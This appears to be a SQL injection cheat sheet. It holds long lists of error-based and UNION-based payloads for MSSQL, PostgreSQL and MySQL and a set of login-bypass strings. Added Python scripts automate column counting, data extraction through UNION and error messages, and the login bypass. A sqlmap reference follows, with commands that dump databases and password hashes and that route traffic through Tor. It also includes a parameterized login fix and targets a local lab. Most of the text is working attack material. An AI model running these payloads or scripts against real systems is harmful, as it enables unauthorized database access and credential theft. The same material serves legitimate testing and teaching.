AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
 AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
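The ORDER BY n, UNION ALL SELECT NULL,... and 'INJ'||'ECT'||'XXX' lines above are three steps of one UNION-based procedure: count the columns of the original SELECT, find which of them the page actually displays, then put a subquery into a displayed column. The following is an added example, not code from the original page: it runs those three probes against a constructed, deliberately vulnerable query. The table posts, its rows and the page template are made up, and SQLite stands in for the real DBMS so that it runs offline.

```python
# Added example (not from the original page): automates the ORDER BY / UNION
# NULL column-count probes and the split-marker probe against a constructed,
# deliberately vulnerable query. Table, rows and page template are made up.
import sqlite3


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER, title TEXT, body TEXT, author TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?, ?, ?)",
                    [(1, "hello", "first post", "alice"),
                     (2, "bye", "second post", "bob")])
    return con


def vulnerable_query(con, user_id):
    """Deliberately vulnerable sink: the id parameter is concatenated into SQL.
    Only three of the four table columns are selected, so three is the number
    a UNION has to match; the table's own column count is irrelevant."""
    sql = "SELECT id, title, author FROM posts WHERE id=" + user_id
    try:
        return True, con.execute(sql).fetchall()
    except sqlite3.Error:
        return False, []


def render_page(rows):
    """Mimics the web page: title and author are displayed, id never is."""
    return "\n".join(f"<h2>{title}</h2><p>by {author}</p>" for _id, title, author in rows)


def column_count_order_by(con, max_cols=30):
    """ORDER BY n succeeds only while n <= number of selected columns, so the
    first n that errors gives the count as n-1 (the 'ORDER BY 1,2,...' probes)."""
    for n in range(1, max_cols + 1):
        ok, _ = vulnerable_query(con, f"1 ORDER BY {n}-- ")
        if not ok:
            return n - 1
    return None


def column_count_union(con, max_cols=30):
    """The 'UNION ALL SELECT NULL,NULL,...' probes: the first NULL list whose
    length matches the original SELECT stops raising a column-count error."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        ok, _ = vulnerable_query(con, f"1 AND 1=0 UNION ALL SELECT {nulls}-- ")
        if ok:
            return n
    return None


def reflected_columns(con, ncols):
    """Put 'INJ'||'ECT'||'XXX' in one column at a time and look for INJECTXXX
    in the rendered page. The marker is split so that the joined string can
    only come from the database concatenating it, not from the request being
    echoed back; only columns the page displays will show it."""
    hits = []
    for pos in range(ncols):
        cols = ["NULL"] * ncols
        cols[pos] = "'INJ'||'ECT'||'XXX'"
        ok, rows = vulnerable_query(con, "1 AND 1=0 UNION ALL SELECT " + ",".join(cols) + "-- ")
        if ok and "INJECTXXX" in render_page(rows):
            hits.append(pos + 1)
    return hits


def extract_via_union(con, ncols, column, expression):
    """Replace a displayed column with any scalar subquery to read data out."""
    cols = ["NULL"] * ncols
    cols[column - 1] = expression
    ok, rows = vulnerable_query(con, "1 AND 1=0 UNION ALL SELECT " + ",".join(cols) + "-- ")
    return render_page(rows) if ok else ""


if __name__ == "__main__":
    con = build_db()
    n = column_count_order_by(con)
    print("columns (ORDER BY):", n, " columns (UNION NULL):", column_count_union(con))
    shown = reflected_columns(con, n)
    print("displayed columns:", shown)
    # sqlite_master plays the role of information_schema here
    print(extract_via_union(con, n, shown[0],
                            "(SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1)"))
```

The `||` concatenation in the marker is what PostgreSQL, Oracle and SQLite understand; MySQL treats `||` as logical OR unless PIPES_AS_CONCAT is set, so there the marker has to be built with CONCAT(), and MSSQL uses `+` (as the CHAR(...)+CHAR(...) lines above do). NULL is used as the filler because it is compatible with every column type, which is why the NULL lists are more reliable than the numeric 1,2,3 lists when a column is a string or a date.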
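The CONVERT(INT,...) lines, the CAST(... AS NUMERIC) line and the FLOOR(RAND(0)*2) ... GROUP BY line above are sqlmap-style error-based probes for MSSQL, PostgreSQL and MySQL respectively. Each forces a type-conversion (or duplicate-key) error whose message contains a string the attacker built, wrapped between two random markers, so that the value can be cut out of the error text; the CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) part is how a true condition shows up as the character 1. The block below is an added example, not code from the original page: it decodes the CHAR()/CHR()/hex marker strings used in those payloads and extracts the value from the error text. The error messages in it are constructed samples that follow each DBMS's real message format, not captured output.

```python
# Added example (not from the original page): decodes the marker strings used
# in the error-based probes above and pulls the extracted value out of the
# DBMS error text. The error messages are constructed samples.
import re

# The delimiters used by the three error-based payloads above, written as
# MySQL hex literals (0x716a7a6a71 / 0x71706a6b71).
PREFIX_HEX = "0x716a7a6a71"
SUFFIX_HEX = "0x71706a6b71"


def decode_char_chain(expr):
    """MSSQL CHAR(n)+CHAR(n)+... or PostgreSQL CHR(n)||CHR(n)||... -> text."""
    return "".join(chr(int(n)) for n in re.findall(r"\bCHA?R\((\d+)\)", expr))


def decode_hex_literal(lit):
    """MySQL 0x... string literal -> text."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def extract_between(error_text, prefix, suffix):
    """Return whatever the DBMS placed between the two markers, or None if the
    markers are absent (errors suppressed, so error-based extraction is out)."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


def extract_from_error(error_text):
    """Locate the marker-wrapped value whichever DBMS produced the error."""
    return extract_between(error_text,
                           decode_hex_literal(PREFIX_HEX),
                           decode_hex_literal(SUFFIX_HEX))


# Constructed samples in the shape of the conversion errors each payload provokes.
SAMPLE_ERRORS = {
    "mssql": "Conversion failed when converting the nvarchar value 'qjzjq1qpjkq' to data type int.",
    "postgresql": 'ERROR:  invalid input syntax for type numeric: "qjzjq1qpjkq"',
    # MySQL FLOOR(RAND(0)*2) trick: the duplicate GROUP BY key carries the value,
    # followed by the 0/1 that FLOOR() produced.
    "mysql": "Duplicate entry 'qjzjq1qpjkq1' for key 'group_key'",
}

if __name__ == "__main__":
    # What the probe strings in the CONVERT lines actually spell
    print(decode_char_chain("CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)"))
    print(decode_char_chain("CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113)"))
    for dbms, text in SAMPLE_ERRORS.items():
        print(dbms, "->", extract_from_error(text))
```

The markers are random per sqlmap session; the point of checking for both is that a real conversion error from the application's own data would never contain them, so a hit is proof that the injected expression was evaluated. Replace the 1/0 CASE expression with a subquery such as (SELECT TOP 1 name FROM sysobjects) and the same extraction returns that value.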
5. SQL injection auth bypass payloads


'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
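The payloads above target two shapes of login code: most of them (admin' --, ' or 1=1-- and so on) work against a query that has both the username and the password condition spliced into the WHERE clause, and the comment removes the password check; the two 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 lines target code that looks the row up by username and compares the password hash in application code, because the UNION row supplies both the username and the hash of a password the attacker chose (81dc9bdb52d04dc20036dbd8313ed055 is md5('1234')). The following is an added example, not code from the original page, showing both vulnerable shapes beside a parameterized version; the users table, the stored account, and the MD5 password hashing (kept only so that the page's UNION payload applies) are made up, and SQLite stands in for the real DBMS.

```python
# Added example (not from the original page): a constructed login routine in
# the two shapes the auth-bypass payloads target, next to a hardened version.
# The table, the account and the MD5 hashing are made up for the demo.
import hashlib
import hmac
import sqlite3


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", (md5_hex("S3cr3t!"),))
    return con


def login_concat(con, username, password):
    """Deliberately vulnerable: username and password hash are spliced into the
    WHERE clause, so a quote plus a comment in the username drops the password
    check entirely (admin' --, ' or 1=1-- ...)."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password_hash='" + md5_hex(password) + "'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a syntax error just fails the login
    return row[0] if row else None


def login_union(con, username, password):
    """Deliberately vulnerable variant: the row is fetched by username only and
    the hash is compared in application code. The UNION payload makes the
    database return a row whose hash the attacker controls, so the comparison
    succeeds with the password the attacker picked."""
    sql = "SELECT username, password_hash FROM users WHERE username='" + username + "'"
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    if row and row[1] == md5_hex(password):
        return row[0]
    return None


def login_safe(con, username, password):
    """Hardened: a bound parameter is data, never SQL, so every payload above is
    just a username that does not exist. (Use bcrypt/argon2 rather than MD5 in
    real code; parameterization fixes injection, not weak hashing.)"""
    row = con.execute("SELECT username, password_hash FROM users WHERE username=?",
                      (username,)).fetchone()
    if row and hmac.compare_digest(row[1], md5_hex(password)):
        return row[0]
    return None


UNION_PAYLOAD = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"

if __name__ == "__main__":
    con = build_db()
    # admin' # fails here: '#' is a comment in MySQL but not in SQLite, which is
    # why the list above carries --, # and /* variants of every payload.
    for user in ["admin' -- ", "' or 1=1-- ", "admin' #"]:
        print(repr(user), "concat:", login_concat(con, user, "wrong"),
              "safe:", login_safe(con, user, "wrong"))
    print("union:", login_union(con, UNION_PAYLOAD, "1234"),
          "safe:", login_safe(con, UNION_PAYLOAD, "1234"))
```

Two details worth noticing when testing a real login form: ' or '1'='1 without a trailing comment only bypasses the check when it lands in the last condition, because AND binds tighter than OR; and the UNION variant needs the same number of columns as the original SELECT, which is why that payload supplies exactly two values.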

Learning sqlmap

Command overview

A fairly detailed reference article: https://www.freebuf.com/sectool/164608.html

Basic sqlmap commands:
1. Show the version
sqlmap.py --version
2. Show help
sqlmap.py --help
3. Test whether a URL parameter is injectable
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1
4. Never prompt for input and accept every default answer (note that sqlmap's default probes are noisy and may trigger WAF alerts)
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --batch
5. Enumerate all databases
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dbs
6. Show the database the web application is currently using
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-db
7. Show the database user the application connects as
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-user
8. List all database users
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --users
9. List the database users together with their password hashes
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --passwords
10. List all tables in the database bts
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --tables -D bts
11. List the structure (all columns) of the table users in database bts
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --columns -D bts -T users
12. Dump the columns username and password of the table users in database bts
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump -D bts -T users -C "username,password"
13. Dump the entire database
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump-all
Options
--version: show the sqlmap version number
-h: show help
-hh: show the advanced help
-v VERBOSE: verbosity level, VERBOSE is a number, default 1
Target
-d DIRECT: connect to the database directly
-u URL or --url=URL: target URL
-l LOGFILE: parse targets from a Burp or WebScarab proxy log
-x SITEMAPURL: parse targets from a sitemap XML file
-m BULKFILE: scan multiple targets listed in a text file
-r REQUESTFILE: load an HTTP request from a file (typically used to test POST requests for SQL injection)
-g GOOGLEDORK: use the results of a Google dork as target URLs
-c CONFIGFILE: load options from an INI configuration file
Request
--method=METHOD: force a specific HTTP method (e.g. PUT)
--data=DATA: data string to send in a POST request
--param-del=PARAMDEL: character used to split parameter values (e.g. &)
--cookie=COOKIE: HTTP Cookie header value
--cookie-del=COOKIEDEL: character used to split cookie values (e.g. the semicolon ;)
--load-cookies=LOADCOOKIES: file containing cookies in Netscape/wget format
--drop-set-cookie: ignore the Set-Cookie header in responses
--user-agent: HTTP User-Agent header value
--random-agent: use a randomly selected HTTP User-Agent header value
--host=HOST: HTTP Host header value
--referer=REFERER: HTTP Referer header value
-H HEADER: one extra HTTP header
--headers=HEADERS: extra HTTP headers
--auth-type=AUTHTYPE: HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred=AUTHCRED: HTTP authentication credentials (name:password)
--auth-file=AUTHFILE: HTTP authentication PEM certificate/private key file
--ignore-code=IGNORECODE: ignore a specific HTTP error code (e.g. 401)
--ignore-proxy: ignore the system default proxy settings
--ignore-redirects: ignore redirection attempts
--ignore-timeouts: ignore connection timeouts
--proxy=PROXY: use a proxy to connect to the target URL
--proxy-cred=PROXYCRED: proxy authentication credentials (name:password)
--proxy-file=PROXYFILE: load a proxy list from a file
--tor: use the Tor anonymity network (usually you also need to raise the default timeout and specify the Tor proxy address)
--tor-port=TORPORT: set a Tor proxy port other than the default
--tor-type=TORTYPE: set the Tor proxy type (HTTP, SOCKS4 or SOCKS5; default SOCKS5)
--check-tor: check whether Tor is being used properly
--delay=DELAY: delay in seconds between each HTTP request
--timeout=TIMEOUT: seconds to wait before the connection times out
--retries=RETRIES: retries when the connection times out (default 3)
--randomize=RPARAM: randomly change the value of the given parameter(s)
--safe-url=SAFEURL: URL to visit frequently during testing
--safe-post=SAFEPOST: POST data to send to the safe URL
--safe-req=SAFEREQ: load the safe HTTP request from a file
--safe-freq=SAFEFREQ: number of test requests between two visits to the safe URL
--skip-urlencode: skip URL-encoding of the payload data
--csrf-token=CSRFTOKEN: parameter that holds the anti-CSRF token
--csrf-url=CSRFURL: URL to visit to extract the anti-CSRF token
--force-ssl: force the use of SSL/HTTPS
--hpp: use the HTTP parameter pollution method
--eval: evaluate the provided Python code before each request
Optimization
-o: turn on all optimization switches
--predict-output: predict common query output
--keep-alive: use persistent HTTP(S) connections
--null-connection: retrieve the page length without the actual HTTP response body
--threads=THREADS: maximum number of concurrent HTTP(S) requests
Injection
-p TESTPARAMETER: parameter(s) to test
--skip=SKIP: skip testing of the given parameter(s)
--skip-static: skip testing parameters that do not look dynamic
--param-exclude=PARAMEXCLUDE: regular expression to exclude parameters from testing
--dbms=DBMS: force the back-end DBMS to the given type
--dbms-cred=DBMSCRED: DBMS authentication credentials (name:password)
--os=OS: force the back-end DBMS operating system to the given value
--invalid-logical: use big numbers to invalidate values
--invalid-string: use random strings to invalidate values
--no-cast: turn off the payload casting mechanism
--no-escape: turn off the string escaping mechanism
--prefix=PREFIX: injection payload prefix string
--suffix=SUFFIX: injection payload suffix string
--tamper=TAMPER: use the given script(s) to tamper the injection data
Detection
--level=LEVEL: level of tests to perform (1-5, default 1)
--risk=RISK: risk of tests to perform (1-5, default 1)
--string=STRING: string to match in the page when the query evaluates to True
--not-string=NOTSTRING: string to match in the page when the query evaluates to False
--regexp=REGEXP: regular expression to match in the page when the query evaluates to True
--code=CODE: HTTP status code to match when the query evaluates to True
--text-only: compare pages based only on their text content
--titles: compare pages based only on their titles
Techniques
--technique=TECH: SQL injection techniques to use (default BEUST)
--time-sec=TIMESEC: seconds to delay the DBMS response
--union-cols=UCOLS: range of columns to test for UNION query injection
--union-char=UCHAR: character to use for brute-forcing the number of columns
--union-from=UFROM: table to use in the FROM part of the UNION query injection
--dns-domain=DNSDOMAIN: domain name used for the DNS exfiltration attack
Enumeration
-a or --all: retrieve everything
-b, --banner: retrieve the DBMS banner
--current-user: retrieve the DBMS current user
--current-db: retrieve the DBMS current database
--hostname: retrieve the DBMS server hostname
--is-dba: detect whether the DBMS current user is a DBA
